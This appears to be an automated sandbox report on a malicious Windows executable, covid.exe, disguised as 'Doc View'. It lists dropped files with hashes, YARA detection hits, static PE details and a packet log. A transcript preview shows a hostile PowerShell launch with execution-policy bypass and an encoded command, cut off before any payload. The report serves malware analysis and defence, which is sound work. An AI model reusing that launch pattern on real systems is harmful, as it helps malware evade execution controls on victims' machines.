                                                                                                                                                                    Preview: /*!.. * SlickNav Responsive Mobile Menu v1.0.10.. * (c) 2016 Josh Cope.. * licensed under MIT.. */..!function(e,t,n){function a(t,n){this.element=t,this.settings=e.extend({},i,n),this.settings.duplicate||n.hasOwnProperty("removeIds")||(this.settings.removeIds=!1),this._defaults=i,this._name=s,this.init()}var i={label:"MENU",duplicate:!0,duration:200,easingOpen:"swing",easingClose:"swing",closedSymbol:"&#9658;",openedSymbol:"&#9660;",prependTo:"body",appendTo:"",parentTag:"a",closeOnClick:!1,allowParentLinks:!1,nestedParentLinks:!0,showChildren:!1,removeIds:!0,removeClasses:!1,removeStyles:!1,brand:"",animations:"jquery",init:function(){},beforeOpen:function(){},beforeClose:function(){},afterOpen:function(){},afterClose:function(){}},s="slicknav",o="slicknav",l={DOWN:40,ENTER:13,ESCAPE:27,LEFT:37,RIGHT:39,SPACE:32,TAB:9,UP:38};a.prototype.init=function(){var n,a,i=this,s=e(this.element),r=this.settings;if(r.duplicate?i.mobileNav=s.clone():i.mobileNav=s,r.removeIds&&(i.mobileNav.removeAt
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):18817
                                                                                                                                                                    Entropy (8bit):5.001217266823362
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:ufib4GGVoGIpN6KQkj2Akjh4iUxGzCdaOdB/NXp5CvOjJEYoV4fib41:uIGV3IpNBQkj25h4iUxGzCdaOdB/NZwY
                                                                                                                                                                    MD5:DB93B232EFF0785FDDC28A0D5DAE38D2
                                                                                                                                                                    SHA1:AF5AFE47557C49F165F66B2B63962D9EB28E3157
                                                                                                                                                                    SHA-256:92939214003421B64153B215D15F89595673C709110FC6E005FF955F6684C390
                                                                                                                                                                    SHA-512:5D161CFEE2631553AC2FA8EE407FE4CBA23C9A666BB69049C0FCCBEE99413983C678E4779426532FB4F5E622155C9EFF8DA57CD93AE4453D57301B32C19CBAA9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1576
                                                                                                                                                                    Entropy (8bit):5.411651944516252
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:q8rB4nqRL/HEekfe9t4CvpBfuWpm8V8w6qRK:7rqnObHbkevpBfuWpEQK
                                                                                                                                                                    MD5:A2EF076C5ADD10C00105AC8BCA3B7C70
                                                                                                                                                                    SHA1:F37BB56A14BABDC8D445AE09E3FFCE2EE396CF86
                                                                                                                                                                    SHA-256:8EE59A2F9C7179512FFFE322D083DB58F52CB3B9DBF0B6EE97BCEF82625F2CA1
                                                                                                                                                                    SHA-512:D69269BEE2C5A7451E8B7CC961E115D28A38A048C6716A75CE07EE211FA907DEF7BE0E9CBCA5D2474B412598CE9D693C1AB8D51C9E21AFD582D5C82C0F7ADA7C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: @...e................................................@..........0..............@.....?.@.....J.C........docview.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..8................'....L..}............System.Numerics.4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD...............
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dqyvpjs.mb5.psm1
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: 1
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnfqvlmt.og0.ps1
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: 1
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFC094D247FA2B2273.TMP
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):56980
                                                                                                                                                                    Entropy (8bit):1.5510816207891007
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:kBqoxKE8s/U4iI1uuhW2f2PzE7Xu+h5u+hjkf2Pzv7Xu+h5u+hj:Clf4o7XPnPVkf4r7XPnPV
                                                                                                                                                                    MD5:A222F46D8821643127FD3E91D6AC16C4
                                                                                                                                                                    SHA1:B13750D20D2523DC3A724859F462B10CD1D44667
                                                                                                                                                                    SHA-256:F31A8DE6A7104C9FF07D0212081B29CD34AC40D0F3F332FE70BA5DCCEF93E0BD
                                                                                                                                                                    SHA-512:2C852FDB2B9FBF75B58A821190515692C1A16021149778C8B22A4FB98B8A879AB1131AA0452A4A6B8D784B826E8A2203EE249335D46E3F4FE127A25EE3527FFC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFE20E719C21EBC887.TMP
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13077
                                                                                                                                                                    Entropy (8bit):0.5045233227469824
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:c9lLh9lLh9lIn9lIn9loIF9low9lWKkySi3e:kBqoIb9KkySge
                                                                                                                                                                    MD5:5F103EC8F17FC5E6014268BCC84B7C91
                                                                                                                                                                    SHA1:6DF8B80A554516CC1E9B3FF6E68954F5FA6E053A
                                                                                                                                                                    SHA-256:4724D19AFC4E4CA0E45C1222DDAA3B07C2441029E14B3DA57EE162B0E353C812
                                                                                                                                                                    SHA-512:C9D0BB6CDA3B571BC6A4B5D616E679E802D3F84314F2D384C93817644A451A8A9A06E9213BFF33E02689312F34965982E93EBB897CC6C6939C88383CC7F755A0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFE90822A1FC75C3D3.TMP
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):25441
                                                                                                                                                                    Entropy (8bit):0.27918767598683664
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laA:kBqoxxJhHWSVSEab
                                                                                                                                                                    MD5:AB889A32AB9ACD33E816C2422337C69A
                                                                                                                                                                    SHA1:1190C6B34DED2D295827C2A88310D10A8B90B59B
                                                                                                                                                                    SHA-256:4D6EC54B8D244E63B0F04FBE2B97402A3DF722560AD12F218665BA440F4CEFDA
                                                                                                                                                                    SHA-512:BD250855747BB4CEC61814D0E44F810156D390E3E9F120A12935EFDF80ACA33C4777AD66257CCA4E4003FEF0741692894980B9298F01C4CDD2D8A9C7BB522FB6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Roaming\buyonegetone.exe
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):274944
                                                                                                                                                                    Entropy (8bit):6.321651525899225
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:jFbIM6WOmdLKer5Jfiitm/Nge3vXjBZ9jSg2xq0REgPXRi+RoY46eLzkKvqpuEgU:jFQxmd7frtm/S+v9jj+RY8ohdL4JMU
                                                                                                                                                                    MD5:3087BC614A52D038FC9F62DE3DD2C61F
                                                                                                                                                                    SHA1:DA730B6FBA5A8C6F70347FF6778B089B7774EBE3
                                                                                                                                                                    SHA-256:590E6B67EE4745A4B5E2DBC85021C05360AF8401EDE1B1C5770CD3F50DEB8D41
                                                                                                                                                                    SHA-512:A0E1335023E9C951E697CC28446FC017BB8E3C79FDA70FD8F2BB8BCEF26F3EB6FB7896C207153816D1B5EEA3EE8D303442143ED2BF943FD55C49BED554412AB1
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2820
                                                                                                                                                                    Entropy (8bit):5.480665872859646
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:BZSvh/oO9WhIJsT+rfEhMDvCzh6SQF6BHkmvpZ21QpiqDYB1Z3nTEMEK+FmuJMqD:BZuh/N1Js+rfwOrSQ8amvpZ21lqDo1ZK
                                                                                                                                                                    MD5:F8DF3C63A054D4FEFA6A976A528ABC31
                                                                                                                                                                    SHA1:100548147866D5C91E5B26BF708115356CD7B7A0
                                                                                                                                                                    SHA-256:276F997207286163549A198F5E8A463152496686DFDF0044E46B086260E1FDD0
                                                                                                                                                                    SHA-512:B0E8D947BA8D455D72BEE0A71072747A67C38374FD59D309A082F5351DCCD9C8535D7E646ED22E2AF2C3A24CC6A4C1AA7877B76F72F50F4E13324C0F6A74123F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, Author: Florian Roth
                                                                                                                                                                    • Rule: JoeSecurity_PowershellLoadEncryptedAssembly, Description: Yara detected Powershell Load Encrypted Assembly, Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, Author: Joe Security
                                                                                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210401080426..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 131521 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\system32\windowspowershell\v1.0\powershell.exe -sta -noprofile -executionpolicy bypass -encodedcommand

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Entropy (8bit):2.855782258459279
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: covid.exe
File size: 5253560
MD5: a990c03d14bef241e880d6167fa5a6aa
SHA1: 210c7bed3182e3113b9a20816ced2f9c2ad6f86a
SHA256: 9d0cc73772d79a0561d03db4e6aca9fad9b125afbbc7f2b4f7f3df25eeed56a0
SHA512: c62e88aaa150e73ccaf7061aeb07198ae42b7a9a4a19a052c839917dd7bdb1326c3518fbdaf3effde03c921c07a1bc6c6a284534757dd15d4277070ae757e213
SSDEEP: 1536:LLh9KxmwAPQDPjPbFxCxQIxSPTSWPyl1tszJDrj:LLh9Lsrj
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Jb`..................O.........>.P.. ... P...@.. ........................P.....z{P...@................................

File Icon

Icon Hash: 4e9292f2c88cd3cc

Static PE Info

General

Entrypoint: 0x90153e
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x60624A84 [Mon Mar 29 21:45:40 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid: false
Signature Issuer: CN=John
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487
Not Before, Not After:
• 3/29/2021 2:16:27 PM, 3/28/2025 5:00:00 PM
Subject Chain:
• CN=John
Version: 3
Thumbprint MD5: 3A825397D9E1C8350DC4D06EC81C2A51
Thumbprint SHA-1: 3820EAF1E6391B2C4233D2AAA26A30141E153FA8
Thumbprint SHA-256: 9C0D13758481938CD654236FABD07B08BEE28C00A5B3F78C1114FE4757145EED
Serial: 797DB554AF6FA98C4CE65D63E485094A

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5014f0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x502000 | 0x2c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x502600 | 0x3b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x506000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x4ff544 | 0x4ff600 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x502000 | 0x2c00 | 0x2c00 | False | 0.147904829545 | data | 3.27620880311 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x506000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x502458 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 134217728, next used block 117440512 | |
RT_GROUP_ICON | 0x504a00 | 0x14 | data | |
RT_VERSION | 0x502130 | 0x324 | data | |
RT_MANIFEST | 0x504a18 | 0x1e4 | ASCII text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | 2021 Doc View
Assembly Version | 1.0.0.0
InternalName | docview.exe
FileVersion | 1.0.0.0
CompanyName | Doc View
LegalTrademarks |
Comments | Doc View
ProductName | Doc View
ProductVersion | 1.0.0.0
FileDescription |
OriginalFilename | docview.exe

Network Behavior

Network Port Distribution

TCP Packets

                                                                                                                                                                    Apr 1, 2021 08:04:41.009370089 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.009398937 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.009404898 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.009414911 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.009473085 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.009489059 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.009493113 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.009501934 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.009505987 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.009522915 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.009543896 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.009552956 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.009562016 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.009578943 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.009591103 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.009596109 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.009609938 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.009625912 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.009654045 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.011637926 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.011662006 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.011674881 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.011692047 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.011709929 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.011725903 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.011728048 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.011745930 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.011773109 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.011796951 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.052813053 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.052843094 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.052855015 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.052870989 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.052918911 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.052934885 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.052951097 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.052968025 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.052983046 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.052999020 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.052999020 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053014040 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053030014 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053037882 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053096056 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053113937 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053124905 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053133011 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053138018 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053147078 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053149939 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053168058 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053183079 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053203106 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053203106 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053215027 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053221941 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053236961 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053241014 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053256989 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053263903 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053273916 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053291082 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053297997 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053308010 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053325891 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.053330898 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053360939 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.053401947 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.055100918 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055134058 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055146933 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055159092 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055176020 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055192947 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055212021 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055221081 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.055228949 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055246115 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055250883 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.055262089 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055279970 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055291891 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.055295944 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055313110 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055319071 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.055329084 CEST4434970823.111.9.35192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.055356026 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:41.055389881 CEST49708443192.168.2.323.111.9.35
                                                                                                                                                                    Apr 1, 2021 08:04:47.307346106 CEST49735443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.307522058 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.358891010 CEST44349735172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.358993053 CEST49735443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.359214067 CEST44349734172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.360271931 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.410121918 CEST49735443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.411181927 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.461678982 CEST44349735172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.462723970 CEST44349734172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.474253893 CEST44349735172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.474281073 CEST44349735172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.474298000 CEST44349735172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.474411964 CEST49735443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.474442959 CEST49735443192.168.2.3172.217.168.2
